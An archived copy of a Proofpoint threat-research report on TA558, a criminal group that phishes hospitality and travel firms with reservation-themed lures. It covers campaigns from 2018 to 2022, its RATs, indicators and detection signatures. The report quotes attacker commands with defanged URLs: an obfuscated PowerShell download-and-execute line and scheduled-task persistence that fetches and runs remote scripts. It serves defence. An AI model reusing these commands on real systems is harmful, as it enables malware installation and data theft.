{
	"id": "78cd11d3-5eb9-45e3-9f7f-d8677a01d94d",
	"created_at": "2026-04-06T00:19:31.260166Z",
	"updated_at": "2026-04-10T03:34:00.986459Z",
	"deleted_at": null,
	"sha1_hash": "3a39a0c99f1c8759d3a2abfe8183362b5cd5b782",
	"title": "TA558 Threat Actor Targets Hospitality \u0026 Travel | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 913498,
	"plain_text": "TA558 Threat Actor Targets Hospitality \u0026 Travel | Proofpoint US\r\nBy Joe Wise, Selena Larson and the Proofpoint Threat Research Team\r\nPublished: 2022-08-16 · Archived: 2026-04-05 23:05:27 UTC\r\nKey Findings:\r\nTA558 is a likely financially motivated small crime threat actor targeting hospitality, hotel, and travel\r\norganizations.\r\nSince 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety\r\nof malware including Loda RAT, Vjw0rm, and Revenge RAT.\r\nTA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin\r\nAmerica region, with additional targeting observed in Western Europe and North America.\r\nTA558 increased operational tempo in 2022 to a higher average than previously observed.\r\nLike other threat actors in 2022, TA558 pivoted away from using macro-enabled documents in campaigns\r\nand adopted new tactics, techniques, and procedures.\r\nOverview\r\nSince 2018, Proofpoint has tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel,\r\nand related industries located in Latin America and sometimes North America and western Europe. The actor\r\nsends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed\r\nlures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments\r\nor URLs aiming to distribute one of at least 15 different malware payloads, typically remote access trojans\r\n(RATs), that can enable reconnaissance, data theft, and distribution of follow-on payloads.\r\nProofpoint tracked this actor based on a variety of email artifacts, delivery and installation techniques, command\r\nand control (C2) infrastructure, payload domains, and other infrastructure.\r\nIn 2022, Proofpoint observed an increase in activity compared to previous years. 
Additionally, TA558 shifted\r\ntactics and began using URLs and container files to distribute malware, likely in response to Microsoft\r\nannouncing it would begin blocking VBA macros downloaded from the internet by default.\r\nTA558 has some overlap with activity reported by Palo Alto Networks in 2018, Cisco Talos in\r\n2020 and 2021, Uptycs in 2020, and HP in 2022. This report is the first comprehensive, public report on TA558,\r\ndetailing activity conducted over four years that is still ongoing. The information used in the creation of this report\r\nis based on email campaigns, which are manually contextualized, and analyst-enriched descriptions of\r\nautomatically condemned threats.\r\nCampaign Details and Activity Timeline\r\n2018\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 1 of 14\n\nProofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments\r\nthat exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and\r\ninstall malware. Two of the most common malware payloads included Loda and Revenge RAT. Campaigns were\r\nconducted exclusively in Spanish and Portuguese and targeted the hospitality and related industries, with\r\n“reserva” (Portuguese word for “reservation”) themes. Example campaign:\r\nSubject: Corrigir data da reserva para o dia 03\r\nAttachment: Booking - Dados da Reserva.docx\r\nAttachment “Author”: C.D.T Original\r\nSHA256: 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910\r\nFigure 1: Example TA558 email from 2018\r\nThe documents leveraged remote template URLs to download an additional RTF document, which then\r\ndownloaded and installed Revenge RAT. Interestingly, the term “CDT” is in the document metadata and in the\r\nURL. 
This term, which may refer to a travel organization, appears throughout TA558 campaigns from 2018 to the\r\npresent.\r\nRTF payload URL example:\r\nhxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc\r\n2019\r\nIn 2019, this actor continued to leverage emails with Word documents that exploited Equation Editor\r\nvulnerabilities (e.g. CVE-2017-11882) to download and install malware. TA558 also began using macro-laden\r\nPowerPoint attachments and template injection with Office documents. This group expanded its malware\r\narsenal to include Loda, vjw0rm, Revenge RAT, and others. In 2019, the group began occasionally expanding\r\ntargeting outside of the hospitality and tourism verticals to include business services and manufacturing. Example\r\ncampaign:\r\nSubject: RESERVA\r\nAttachment: RESERVA.docx\r\nAttachment “Author”: msword\r\nAttachment “Last Saved By”: Richard\r\nSHA256: 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6e\r\nFigure 2: Example TA558 email from 2019\r\nFigure 3: Example TA558 Microsoft Word attachment from 2019\r\nThe documents leveraged a remote template relationship URL to download an additional RTF document. The RTF\r\ndocument (Author: obidah qudah, Operator: Richard) exploited the CVE-2017-11882 vulnerability to retrieve and\r\nexecute an MSI file. Upon execution, the MSI file extracted and ran Loda malware.\r\nIn December 2019, Proofpoint analysts observed TA558 begin to send English-language lures relating to room\r\nbookings in addition to Portuguese and Spanish.\r\n2020\r\nIn 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with\r\nmacros, typically VBA macros, to download and install malware. This group continued to use a variety of\r\nmalware payloads including the addition of njRAT and Ozone RAT.
\r\nHotel, hospitality, and travel organization targeting continued. Although the actor slightly increased its English-language operational tempo throughout 2020, most of the lures featured Portuguese and Spanish reservation\r\nrequests. An example of a common attack chain in 2020:\r\nFrom: Oab Brasil \u003cfernando1540@bol[.]com[.]br\u003e\r\nSubject: Orçamento Conferencistas - 515449939\r\nAttachment: reserva.ppa\r\nSHA256: c2b817b02e56624c8ed7944e76a3896556dc2b7482f747f4be88f95e232f9207\r\nFigure 4: Example TA558 email from 2020\r\nThe message contained a PowerPoint attachment that used template injection techniques and VBA macros which,\r\nif enabled, executed a PowerShell script to download a VBS payload from an actor-controlled domain. The VBS\r\nscript in turn downloaded and executed Revenge RAT.\r\nFigure 5: 2020 attack path example\r\nTA558 was more active in 2020 than in previous years and in 2021, with 74 campaigns identified. 2018, 2019, and\r\n2021 had 9, 70, and 18 total campaigns, respectively. So far in 2022, Proofpoint analysts have observed 51 TA558\r\ncampaigns.\r\nFigure 6: Total number of TA558 campaigns over time\r\n2021\r\nIn 2021, this actor continued to leverage emails with Office documents containing macros or Office exploits (e.g.\r\nCVE-2017-8570) to download and install malware. Its most consistently used malware payloads included vjw0rm,\r\nnjRAT, Revenge RAT, Loda, and AsyncRAT.\r\nAdditionally, this group started to include more elaborate attack chains in 2021. 
For example, it introduced more\r\nhelper scripts and delivery mechanisms such as embedded Office documents within MSG files.\r\nIn one example 2021 campaign, emails purported to be:\r\nFrom: Financeiro UNIMED \u003cfinanceiro@unimed-corporated[.]com\u003e\r\nSubject: Reserva\r\nReplyto: cdt[name]cdt@gmail[.]com\r\nAttachment: OficioCircularencaminhadoaoSetorFinanceiroUNIMED.docx\r\nSHA256: 2f0f99cbac828092c0ec23e12ecb44cbf53f5a671a80842a2447e6114e4f6979\r\nEmails masqueraded as Unimed, a Brazilian medical work cooperative and health insurance operator. These\r\nmessages contained Microsoft Word attachments with macros which, if enabled, invoked a series of scripts to\r\nultimately download and execute AsyncRAT.\r\nFigure 7: Example TA558 email from 2021\r\nOf note is the repeat use of the string “CDT” contained in the replyto email address and C2 domain names.\r\nAsyncRAT C2 domains:\r\nwarzonecdt[.]duckdns[.]org\r\ncdt2021[.]zapto[.]org\r\nExample PowerShell execution to download and execute AsyncRAT:\r\n$NOTHING = '(Ne\u003c^^\u003et.We'.Replace('\u003c^^\u003e','w-Object\r\nNe');$alosh='bC||||||!@!@nlo'.Replace('||||||!@!@','lient).Dow');\r\n$Dont='adString(''hxxps[:]//brasilnativopousada[.]com[.]br/Final.txt'')\r\n';$YOUTUBE=IEX ($NOTHING,$alosh,$Dont -Join '')|IEX\r\nPersistence was achieved through a scheduled task masquerading as a Spotify service.\r\nschtasks /create /sc MINUTE /mo 1 0 /tn \"Spotfy\" /tr\r\n \"\\\"%windir%\\system32\\mshta.exe\\\"hxxps[:]//www[.]unimed-corporated[.]com/microsoft.txt\" /F\r\nThis was the actor’s least active year. Proofpoint observed just 18 campaigns conducted by TA558 in 2021.\r\n2022\r\nIn 2022, campaign tempo increased significantly. 
Campaigns delivered a mixture of malware such as Loda,\r\nRevenge RAT, and AsyncRAT. This actor used a variety of delivery mechanisms including URLs, RAR\r\nattachments, ISO attachments, and Office documents.\r\nTA558 followed the trend of many threat actors in 2022 and began using container files such as RAR and ISO\r\nattachments instead of macro-enabled Office documents. This is likely due to Microsoft’s announcements in late\r\n2021 and early 2022 about disabling macros by default in Office products, which caused a shift across the threat\r\nlandscape of actors adopting new filetypes to deliver payloads.\r\nAdditionally, TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in\r\n2022, compared to just five campaigns total from 2018 through 2021. Typically, URLs led to container files such\r\nas ISOs or zip files containing executables.\r\nFigure 8: Campaigns using specific threat types over time\r\nFor example, this 2022 Spanish-language campaign featured URLs leading to container files. Messages purported\r\nto be:\r\nFrom: Mauricio Fortunato \u003ccontato@155hotel[.]com[.]br\u003e\r\nSubject: Enc: Reserva Familiar\r\nThe URL purported to be a legitimate 155 Hotel reservation link that led to an ISO file and an embedded batch\r\nfile. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload,\r\nAsyncRAT.\r\nSimilar to earlier campaigns, persistence was achieved via a scheduled task:\r\nschtasks /create /sc MINUTE /mo 1 /tn Turismo /F /tr\r\n\"powershell -w h -NoProfile -ExecutionPolicy Bypass -\r\nCommand start-sleep -s 20;iwr \"\"\\\"\"hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg\"\"\\\"\" -useB|iex;\"\r\nFigure 9: 2022 campaign example chain.\r\nIn April 2022 Proofpoint researchers spotted a divergence from the typical email lure. 
One of the campaigns\r\nincluded a QuickBooks invoice email lure. Additionally, this campaign included the distribution of RevengeRAT,\r\nwhich had not been observed in use by TA558 since December 2020. Messages purported to be:\r\nFrom: Intuit QuickBooks Team \u003cquickbooks@unimed-corporated[.]com\u003e\r\nSubject: QuickBooks Invoice 1000172347\r\nAttachment: 1000172347.xlsm\r\nSHA256: b57a9f7321216c3410ebcc9d4b09e73a652dee9e750f96b2f6d7d1e39e2923d6\r\nThe emails contained Excel attachments with macros that downloaded helper scripts via PowerShell and MSHTA.\r\nThe execution of helper scripts ultimately led to the installation of RevengeRAT. Proofpoint has not seen this\r\ntheme since April, and it is unclear why TA558 temporarily pivoted away from reservations themes.\r\nMalware Use\r\nSince 2018, TA558 has used at least 15 different malware families, sometimes with overlapping command and\r\ncontrol (C2) domains. The most frequently observed payloads include Loda, Vjw0rm, AsyncRAT, and Revenge\r\nRAT.\r\nFigure 10: Number of TA558 campaigns by malware type over time\r\nTypically, TA558 uses attacker-owned and -operated infrastructure. However, Proofpoint has observed TA558\r\nleverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery\r\nand C2 traffic.\r\nLanguage Use\r\nFrom the time Proofpoint began tracking TA558 through 2022, over 90% of campaigns were conducted in Portuguese or\r\nSpanish, with four percent featuring multiple-language lure samples in English, Spanish, or Portuguese.\r\nFigure 11: Campaign totals by language since 2018\r\nInterestingly, the threat actor often switches languages in the same week. 
Proofpoint researchers have observed\r\nthis actor send, for example, a campaign in English and the following day another campaign in Portuguese.\r\nIndividual targeting typically differs based on campaign language.\r\nNotable Campaign Artifacts\r\nIn addition to the consistent lure themes, targeting, message content, and malware payloads, Proofpoint\r\nresearchers observed TA558 using multiple notable patterns in campaign data including the use of certain strings,\r\nnaming conventions and keywords, domains, etc. For example, the actor appears to repeat the term CDT in email\r\nand malware attributes. This may relate to the CDT Travel organization and related travel reservation lure themes.\r\nProofpoint researchers observed TA558 use the CDT term in dozens of campaigns since 2018, in C2 domains,\r\nreplyto email addresses, payload URLs, scheduled task names, Microsoft Office document metadata (i.e.,\r\nAuthor, Last Saved By), and Microsoft Office macro language.\r\nThroughout many of the 2019 and 2020 campaigns the threat actor used various URLs from the domain\r\nsslblindado[.]com to download either helper scripts or malware payloads. Some examples include:\r\nmicrosofft[.]sslblindado[.]com\r\npassagensv[.]sslblindado[.]com\r\nsystem11[.]sslblindado[.]com\r\nLike other threat actors, this group sometimes mimics technology service names to appear legitimate, for\r\nexample by using such terms in payload URLs or C2 domain names. Some examples include:\r\nmicrosofft[.]sslblindado[.]com\r\nfirefoxsystem[.]sytes[.]net\r\ngoogledrives[.]ddns[.]net\r\nAnother interesting pattern was the use of common strings such as “success” and “pitbull”. In several campaigns\r\nProofpoint researchers spotted these strings in C2 domains. 
Some examples include:\r\nsuccessfully[.]hopto[.]org\r\nsuccess20[.]hopto[.]org\r\n4success[.]zapto[.]org\r\nFrom 2019 through 2020, TA558 conducted 10 campaigns that used the keyword “Maringa” or “Maaringa” in payload\r\nURLs or email senders. Maringa is a city in Brazil. Examples include:\r\nmaringareservas[.]com[.]br/seila[.]rtf\r\nmaringa[.]turismo@system11[.]com[.]br\r\nPossible Objectives\r\nProofpoint has not observed post-compromise activity from TA558. Based on the observed payloads, victimology,\r\nand campaign and message volume, Proofpoint assesses with medium to high confidence that this is a financially\r\nmotivated cybercriminal actor.\r\nThe malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral\r\nmovement, and deliver follow-on payloads.\r\nOpen-source reporting provides insight into one possible threat actor objective. In July, CNN Portugal reported a\r\nPortuguese hotel’s website was compromised, and the actor was able to modify the website and direct customers\r\nto a fake reservation page. The actor stole funds from potential customers by posing as the compromised hotel.\r\nAlthough Proofpoint does not associate the identified activity with TA558, it provides an example of possible\r\nfollow-on activity and the impacts to both target organizations and their customers if an actor is able to\r\ncompromise hotel or transportation entities.\r\nConclusion\r\nTA558 is an active threat actor that has targeted hospitality, travel, and related industries since 2018. 
Activity conducted\r\nby this actor could lead to theft of both corporate and customer data, as well as potential financial losses.\r\nOrganizations, especially those operating in targeted sectors in Latin America, North America, and Western\r\nEurope, should be aware of this actor’s tactics, techniques, and procedures.\r\nIndicators of Compromise (IOCs)\r\nThe following IOCs represent a sample of indicators observed by Proofpoint researchers associated with TA558.\r\nC2 Domains\r\nIndicator Description Date Observed\r\nquedabesouro[.]ddns[.]net RevengeRAT C2 Domain 2018\r\nqueda212[.]duckdns[.]org njRAT/RevengeRAT C2 Domain 2018\r\n3030pp[.]hopto[.]org vjw0rm C2 Domain 2018 and 2019\r\nvemvemserver[.]duckdns[.]org Houdini/Loda C2 Domain 2019\r\n4success[.]zapto[.]org Loda C2 Domain 2019\r\nsuccess20[.]hopto[.]org Loda C2 Domain 2020\r\nmsin[.]hopto[.]org Loda C2 Domain 2021 and 2022\r\ncdtpitbull[.]hopto[.]org AsyncRAT C2 Domain 2021 and 2022\r\n111234cdt[.]ddns[.]net njRAT/AsyncRAT C2 Domain 2021 and 2022\r\ncdt2021[.]zapto[.]org AsyncRAT C2 Domain 2021 and 2022\r\n38[.]132[.]101[.]45 RevengeRAT C2 IP 2022\r\nPayload URLs\r\nIndicator Description Date Observed\r\nhxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc RTF payload URL 2018\r\nhxxp[://]hypemediardf[.]com[.]pl/css/css[.]doc Loda Payload URL 2019\r\nhxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txt AsyncRAT Payload URL 2021\r\nhxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txt AsyncRAT Scheduled Task URL 2021\r\nhxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg AsyncRAT Scheduled Task URL 2022\r\nET Signatures\r\nETPRO MALWARE Loda Logger CnC Activity\r\nETPRO TROJAN MSIL/Revenge-RAT Keep-Alive Activity 
(Outbound)\r\nETPRO TROJAN MSIL/Revenge-RAT CnC Checkin\r\nETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M2\r\nETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M4\r\nETPRO TROJAN njRAT/Bladabindi Variant CnC Activity (inf)\r\nETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)\r\nETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (inf)\r\nET TROJAN Bladabindi/njRAT CnC Command (ll)\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel"
	],
	"report_names": [
		"reservations-requested-ta558-targets-hospitality-and-travel"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "316b23b5-e097-4dc6-8b1c-d096860c6c16",
			"created_at": "2022-10-25T16:07:24.290801Z",
			"updated_at": "2026-04-10T02:00:04.924688Z",
			"deleted_at": null,
			"main_name": "TA558",
			"aliases": [],
			"source_name": "ETDA:TA558",
			"tools": [
				"AZORult",
				"AsyncRAT",
				"Bladabindi",
				"ExtRat",
				"Jorik",
				"Loda",
				"Loda RAT",
				"LodaRAT",
				"Nymeria",
				"PuffStealer",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Rultazo",
				"Socmer",
				"Vengeance Justice Worm",
				"Vjw0rm",
				"Xtreme RAT",
				"XtremeRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cf91b389-9602-45c0-8d6b-c61d14800f54",
			"created_at": "2023-01-06T13:46:39.448277Z",
			"updated_at": "2026-04-10T02:00:03.332604Z",
			"deleted_at": null,
			"main_name": "TA558",
			"aliases": [],
			"source_name": "MISPGALAXY:TA558",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434771,
	"ts_updated_at": 1775792040,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3a39a0c99f1c8759d3a2abfe8183362b5cd5b782.pdf",
		"text": "https://archive.orkl.eu/3a39a0c99f1c8759d3a2abfe8183362b5cd5b782.txt",
		"img": "https://archive.orkl.eu/3a39a0c99f1c8759d3a2abfe8183362b5cd5b782.jpg"
	}
}